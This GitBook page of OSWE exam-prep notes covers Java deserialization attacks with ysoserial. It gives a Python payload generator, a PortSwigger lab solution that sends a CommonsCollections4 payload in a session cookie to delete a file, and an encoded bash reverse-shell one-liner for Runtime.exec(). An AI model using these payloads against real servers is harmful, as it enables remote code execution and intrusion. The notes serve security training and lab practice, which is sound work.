AWAE - OSWE Preparation / Resources
  • TL;DR
  • General
    • Resources
      • BurpSuite
      • WhiteBox
    • POCs
      • Deserialization
        • PHP
        • Java
          • Ysoserial
      • SQL Injection
      • Type Juggling
      • CSRF
  • By Vulnerability
    • SQL Injection
      • Summary
      • Types
      • Injection by clause
      • Bypassing Character Restrictions
      • By Language
        • JAVA
          • Regex
          • Summary
      • Regex
      • Resources
    • Deserialization
      • By Language
        • PHP
          • Regex
          • Summary
          • Practice
        • JAVA
          • Regex
          • Summary
          • Practice
          • Resources
        • .NET
          • Regex
          • Summary
          • Resources
      • Resources
    • XSS
    • XXE
      • By Language
        • PHP
          • Practice
          • Resources
        • Java
          • Vulnerable Libraries' Implementation
      • Resources
    • SSTI
      • Summary
      • Practice
      • Resources
    • File Upload Restrictions Bypass
      • Tricks
      • File Extension Filters Bypass List
      • Resources
  • REGEX
  • By Language
    • PHP
      • Regex
      • Type Juggling
        • Summary
        • Practice
    • Java
      • Decompiling
      • Compiling & Running
    • NodeJS
      • Practice
  • Random
  • Other Repositories
Powered by GitBook
On this page
  • Function
  • Testing
  • Portswigger Labs (Spoiler)
  • Reverse shell Problem

Was this helpful?

  1. General
  2. POCs
  3. Deserialization
  4. Java

Ysoserial

Function

# Download ysoserial from https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

import subprocess
import base64
import urllib.parse

def get_ysoserial_payload(command, payloadType, path_to_ysoserial='ysoserial.jar'):
    proc = subprocess.check_output(['java', '-jar', path_to_ysoserial, payloadType, command])
    base64_payload = base64.b64encode(proc).decode()
    urlEncoded_payload = urllib.parse.quote(base64_payload)
    return urlEncoded_payload

payload = get_ysoserial_payload('command', 'payload')

Testing

Portswigger Labs (Spoiler)

import subprocess
import base64
import requests
import urllib.parse

def get_ysoserial_payload(command, payloadType, path_to_ysoserial='ysoserial.jar'):
    proc = subprocess.check_output(['java', '-jar', path_to_ysoserial, payloadType, command])
    base64_payload = base64.b64encode(proc).decode()
    urlEncoded_payload = urllib.parse.quote(base64_payload)
    return urlEncoded_payload

payload = get_ysoserial_payload('rm /home/carlos/morale.txt', 'CommonsCollections4')
print(payload)

req = requests.get('https://YOUR-SESSION.web-security-academy.net/', cookies={'session': payload})
print(req.text)

Reverse shell Problem

Regarding command execution payloads failure while providing Runtime.getRuntime().exec() multiple commands, we should be using this website for building our payload, which will be divided into different key-surrounded commands who are supported by bash.

echo "bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" | base64
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYxCg==}|{base64,-d}|{bash,-i}
PreviousJavaNextSQL Injection

Last updated 4 years ago

Was this helpful?

java.lang.Runtime.exec() Payload Workarounds - @Jackson_T